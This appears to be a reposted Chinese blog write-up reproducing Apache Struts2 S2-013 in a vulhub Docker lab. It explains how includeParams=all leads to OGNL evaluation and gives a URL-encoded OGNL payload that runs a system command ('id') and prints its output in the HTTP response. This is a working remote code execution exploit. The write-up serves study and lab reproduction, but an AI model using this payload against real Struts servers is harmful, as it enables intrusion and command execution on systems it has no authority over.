1.漏洞描述

        Struts是Apache软件基金会（ASF）赞助的一个开源项目。它最初是Jakarta项目中的一个子项目，并在2004年3月成为ASF的顶级项目。它通过采用JavaServlet/JSP技术，实现了基于JavaEEWeb应用的Model-View-Controller（MVC）设计模式的应用框架，是MVC经典设计模式中的一个经典产品。S2-013中，struts2的标签中<s:a>和<s:url>都有一个includeParams属性，可以设置成如下值①.none-URL中不包含任何参数（默认）②.get-仅包含URL中的GET参数③.all-在URL中包含GET和POST参数当includeParams=all的时候，会将本次请求的GET和POST参数都放在URL的GET参数上。此时<s:a>或<s:url>尝试去解析原始请求参数时，会导致OGNL表达式的执行.

影响版本：Struts 2.0.0-2.3.14

2.漏洞搭建

采用docker方式搭建，使用vulhub。

通过cd命令进入达到vulhub的靶场文件的位置。

通过以下命令启动环境

docker-compose build
docker-compose up -d 

通过ps查看端口号

访问搭建的环境（这种就代表环境搭建成功）

3.复现  

POC:

a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('id').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

复现成功。

最后

以上就是细腻狗为你收集整理的Struts2 S2-013复现1.漏洞描述2.漏洞搭建3.复现  的全部内容，希望文章能够帮你解决Struts2 S2-013复现1.漏洞描述2.漏洞搭建3.复现  所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。